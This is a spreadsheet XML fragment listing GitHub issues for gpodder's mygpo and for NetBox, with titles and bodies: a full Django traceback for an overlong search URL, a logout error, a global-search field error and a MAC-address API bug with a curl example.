    <t>PROPERTY_k__BackingField values can be removed, they contains duplicated data Serialized message example { "MeetingGroupProposalId": "674e153e-a1bf-40ce-aa2e-139bf37cd39a", "Name": "test", "Description": "test", "LocationCity": "test", "LocationCountryCode": "tst", "ProposalUserId": "4065630e-4a4c-4f01-9142-0bacf6b8c64d", "ProposalDate": "2020-03-11T01:08:06.1942544Z", "Id": "d2757a04-e929-4ccf-a23b-360abe1f5b93", "OccurredOn": "2020-03-11T01:08:15.1182219Z", "&amp;lt;MeetingGroupProposalId&gt;k__BackingField": "674e153e-a1bf-40ce-aa2e-139bf37cd39a", "&amp;lt;Name&gt;k__BackingField": "test", "&amp;lt;Description&gt;k__BackingField": "test", "&amp;lt;LocationCity&gt;k__BackingField": "test", "&amp;lt;LocationCountryCode&gt;k__BackingField": "tst", "&amp;lt;ProposalUserId&gt;k__BackingField": "4065630e-4a4c-4f01-9142-0bacf6b8c64d", "&amp;lt;ProposalDate&gt;k__BackingField": "2020-03-11T01:08:06.1942544Z" }</t>
  </si>
  <si>
    <t>https://github.com/gpodder/mygpo/issues/241</t>
  </si>
  <si>
    <t>Searching for long URL causes server error</t>
  </si>
  <si>
    <t xml:space="preserve">Error report  Internal Server Error: /search.json DataError at /search.json value too long for type character varying(2048) Request Method: GET Request URL: https://www.gpodder.net/search.json?q=http://www.masterads.info/instagram/campanha.php?id=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 Django Version: 2.0.8 Python Executable: /srv/mygpo/venv/bin/python3 Python Version: 3.6.5 Python Path: ['/srv/mygpo', '/srv/mygpo/venv/bin', '/srv/mygpo/venv/lib/python36.zip', '/srv/mygpo/venv/lib/python3.6', '/srv/mygpo/venv/lib/python3.6/lib-dynload', '/usr/lib/python3.6', '/srv/mygpo/venv/lib/python3.6/site-packages', '/srv/mygpo'] Server time: Tue, 6 Aug 2019 00:29:26 +0000 Installed Applications: ['django.contrib.contenttypes', 'django.contrib.messages', 'django.contrib.admin', 'django.contrib.humanize', 'django.contrib.auth', 'django.contrib.sessions', 'django.contrib.staticfiles', 'django.contrib.sites', 'django.contrib.postgres', 'django_celery_results', 'django_celery_beat', 'mygpo.core', 'mygpo.podcasts', 'mygpo.chapters', 'mygpo.search', 'mygpo.users', 'mygpo.api', 'mygpo.web', 'mygpo.publisher', 'mygpo.subscriptions', 'mygpo.history', 'mygpo.favorites', 'mygpo.usersettings', 'mygpo.data', 'mygpo.userfeeds', 'mygpo.suggestions', 'mygpo.directory', 'mygpo.categories', 'mygpo.episodestates', 'mygpo.maintenance', 'mygpo.share', 'mygpo.administration', 'mygpo.pubsub', 'mygpo.podcastlists', 'mygpo.votes'] Installed Middleware: ['django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.middleware.locale.LocaleMiddleware', 'django.contrib.messages.middleware.MessageMiddleware'] Traceback: File "/srv/mygpo/mygpo/data/feeddownloader.py" in parse_feed 122. self._validate_parsed(parsed) File "/srv/mygpo/mygpo/data/feeddownloader.py" in _validate_parsed 175. raise NoEpisodesException('no episodes found') During handling of the above exception (no episodes found), another exception occurred: File "/srv/mygpo/mygpo/data/feeddownloader.py" in parse_feed 131. p = Podcast.objects.get(urls__url=self.podcast_url) File "/srv/mygpo/venv/lib/python3.6/site-packages/django/db/models/manager.py" in manager_method 82. return getattr(self.get_queryset(), name)(*args, **kwargs) File "/srv/mygpo/venv/lib/python3.6/site-packages/django/db/models/query.py" in get 403. self.model._meta.object_name The above exception (Podcast matching query does not exist.) was the direct cause of the following exception: File "/srv/mygpo/mygpo/data/feeddownloader.py" in update_podcast 84. parsed, podcast, created = self.parse_feed() File "/srv/mygpo/mygpo/data/feeddownloader.py" in parse_feed 135. raise NoPodcastCreated(ex) from pdne During handling of the above exception (no episodes found), another exception occurred: File "/srv/mygpo/venv/lib/python3.6/site-packages/django/db/backends/utils.py" in _execute 85. return self.cursor.execute(sql, params) File "/srv/mygpo/venv/lib/python3.6/site-packages/psycopg2cffi/_impl/cursor.py" in check_closed_ 30. return func(self, *args, **kwargs) File "/srv/mygpo/venv/lib/python3.6/site-packages/psycopg2cffi/_impl/cursor.py" in execute 263. self._pq_execute(self._query, conn._async) File "/srv/mygpo/venv/lib/python3.6/site-packages/psycopg2cffi/_impl/cursor.py" in _pq_execute 696. self._pq_fetch() File "/srv/mygpo/venv/lib/python3.6/site-packages/psycopg2cffi/_impl/cursor.py" in _pq_fetch 757. raise self._conn._create_exception(cursor=self) The above exception (value too long for type character varying(2048) ) was the direct cause of the following exception: File "/srv/mygpo/venv/lib/python3.6/site-packages/django/core/handlers/exception.py" in inner 35. response = get_response(request) File "/srv/mygpo/venv/lib/python3.6/site-packages/django/core/handlers/base.py" in _get_response 128. response = self.process_exception_by_middleware(e, request) File "/srv/mygpo/venv/lib/python3.6/site-packages/django/core/handlers/base.py" in _get_response 126. response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/srv/mygpo/mygpo/api/simple.py" in tmp 39. return fn(request, *args, format=format, **kwargs) File "/srv/mygpo/venv/lib/python3.6/site-packages/django/utils/decorators.py" in _wrapped_view 142. response = view_func(request, *args, **kwargs) File "/srv/mygpo/mygpo/decorators.py" in tmp 76. return fn(request, *args, **kwargs) File "/srv/mygpo/mygpo/decorators.py" in wrapper 111. resp = f(*args, **kwargs) File "/srv/mygpo/mygpo/api/simple.py" in search 273. results = search_podcasts(query)[:NUM_RESULTS] File "/srv/mygpo/mygpo/directory/search.py" in search_podcasts 21. updater.update_podcast() File "/srv/mygpo/mygpo/data/feeddownloader.py" in update_podcast 115. self._update_podcast(podcast, parsed, episode_updater, res) File "/srv/mygpo/mygpo/data/models.py" in __exit__ 76. self.save() File "/srv/mygpo/venv/lib/python3.6/site-packages/django/db/models/base.py" in save 729. force_update=force_update, update_fields=update_fields) File "/srv/mygpo/venv/lib/python3.6/site-packages/django/db/models/base.py" in save_base 759. updated = self._save_table(raw, cls, force_insert, force_update, using, update_fields) File "/srv/mygpo/venv/lib/python3.6/site-packages/django/db/models/base.py" in _save_table 823. forced_update) File "/srv/mygpo/venv/lib/python3.6/site-packages/django/db/models/base.py" in _do_update 872. return filtered._update(values) &gt; 0 File "/srv/mygpo/venv/lib/python3.6/site-packages/django/db/models/query.py" in _update 709. return query.get_compiler(self.db).execute_sql(CURSOR) File "/srv/mygpo/venv/lib/python3.6/site-packages/django/db/models/sql/compiler.py" in execute_sql 1379. cursor = super().execute_sql(result_type) File "/srv/mygpo/venv/lib/python3.6/site-packages/django/db/models/sql/compiler.py" in execute_sql 1068. cursor.execute(sql, params) File "/srv/mygpo/venv/lib/python3.6/site-packages/django/db/backends/utils.py" in execute 68. return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/srv/mygpo/venv/lib/python3.6/site-packages/django/db/backends/utils.py" in _execute_with_wrappers 77. return executor(sql, params, many, context) File "/srv/mygpo/venv/lib/python3.6/site-packages/django/db/backends/utils.py" in _execute 85. return self.cursor.execute(sql, params) File "/srv/mygpo/venv/lib/python3.6/site-packages/django/db/utils.py" in __exit__ 89. raise dj_exc_value.with_traceback(traceback) from exc_value File "/srv/mygpo/venv/lib/python3.6/site-packages/django/db/backends/utils.py" in _execute 85. return self.cursor.execute(sql, params) File "/srv/mygpo/venv/lib/python3.6/site-packages/psycopg2cffi/_impl/cursor.py" in check_closed_ 30. return func(self, *args, **kwargs) File "/srv/mygpo/venv/lib/python3.6/site-packages/psycopg2cffi/_impl/cursor.py" in execute 263. self._pq_execute(self._query, conn._async) File "/srv/mygpo/venv/lib/python3.6/site-packages/psycopg2cffi/_impl/cursor.py" in _pq_execute 696. self._pq_fetch() File "/srv/mygpo/venv/lib/python3.6/site-packages/psycopg2cffi/_impl/cursor.py" in _pq_fetch 757. raise self._conn._create_exception(cursor=self) Exception Type: DataError at /search.json Exception Value: value too long for type character varying(2048) Request information: USER: AnonymousUser GET: q = 'http://www.masterads.info/instagram/campanha.php?id=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' POST: No POST data FILES: No FILES data COOKIES: No cookie data META: HTTP_ACCEPT = 'application/json' HTTP_CONNECTION = 'close' HTTP_HOST = 'www.gpodder.net' HTTP_USER_AGENT = 'Stremio podcasts addon' HTTP_X_FORWARDED_FOR = '18.184.213.147' HTTP_X_FORWARDED_PROTO = 'https' HTTP_X_REAL_IP = '18.184.213.147' HTTP_X_REQUEST_ID = '81ba942caff03f13c3168ae7994ae70c' PATH_INFO = '/search.json' QUERY_STRING = 'q=http://www.masterads.info/instagram/campanha.php?id=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' RAW_URI = '/search.json?q=http://www.masterads.info/instagram/campanha.php?id=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' REMOTE_ADDR = '' REQUEST_METHOD = 'GET' SCRIPT_NAME = '' SERVER_NAME = 'www.gpodder.net' SERVER_PORT = '443' SERVER_PROTOCOL = 'HTTP/1.0' SERVER_SOFTWARE = 'gunicorn/19.9.0' gunicorn.socket = &lt;socket.socket fd=12, family=AddressFamily.AF_UNIX, type=SocketKind.SOCK_STREAM, proto=0, laddr=/tmp/mygpo.sock&gt; wsgi.errors = &lt;gunicorn.http.wsgi.WSGIErrorsWrapper object at 0x7fa95cdec940&gt; wsgi.file_wrapper = '' wsgi.input = &lt;gunicorn.http.body.Body object at 0x7fa95cdec208&gt; wsgi.multiprocess = True wsgi.multithread = False wsgi.run_once = False wsgi.url_scheme = 'https' wsgi.version = '(1, 0)' </t>
  </si>
  <si>
    <t>https://github.com/gpodder/mygpo/issues/574</t>
  </si>
  <si>
    <t>500 Error when logging out</t>
  </si>
  <si>
    <t>500 Error when trying to log out of gpodder.net See sentry Error https://sentry.io/organizations/skoegl/issues/2028765410/?project=1778079 fix: as per https://stackoverflow.com/questions/63394004/client-object-has-no-attribute-deletetouch-in-django-admin-logout-section, we may need to update memecached client.</t>
  </si>
  <si>
    <t>https://github.com/netbox-community/netbox/issues/18350</t>
  </si>
  <si>
    <t>Global search which matches CircuitTermination results in "CircuitTermination has no field named 'site'"</t>
  </si>
  <si>
    <t xml:space="preserve"> Deployment Type Self-hosted  Triage priority I volunteer to perform this work (if approved)  NetBox Version v4.2.1  Python Version 3.10  Steps to Reproduce Create at least one CircuitTermination where the `xconnect_id` field is populated Global search for the value of that field  Expected Behavior Successful search result page with the CircuitTermination in question listed  Observed Behavior `FieldDoesNotExist`: `CircuitTermination has no field named 'site'`</t>
  </si>
  <si>
    <t>https://github.com/netbox-community/netbox/issues/18363</t>
  </si>
  <si>
    <t>cant create vm mac-address via api</t>
  </si>
  <si>
    <t xml:space="preserve"> Deployment Type Self-hosted  Triage priority N/A  NetBox Version v4.2.1  Python Version 3.10  Steps to Reproduce 1. create an interface on a vm 2. attempt to use the api to create a mac address linked to the interface id (curl example from swagger)  curl -X 'POST' \ 'https://netbox.dev.domain/api/dcim/mac-addresses/' \ -H 'accept: application/json' \ -H 'Content-Type: application/json' \ -H 'X-CSRFTOKEN:{removed}' \ -d '{ "mac_address": "BC:24:11:7E:0E:BF", "assigned_object_type": "virtualization.vminterface", "assigned_object_id": 1 }'   Expected Behavior mac address gets created  Observed Behavior 400 response:  Error: Bad Request Response body Download { "assigned_object_id": [ "This field cannot be null." ] } </t>
  </si>
  <si>
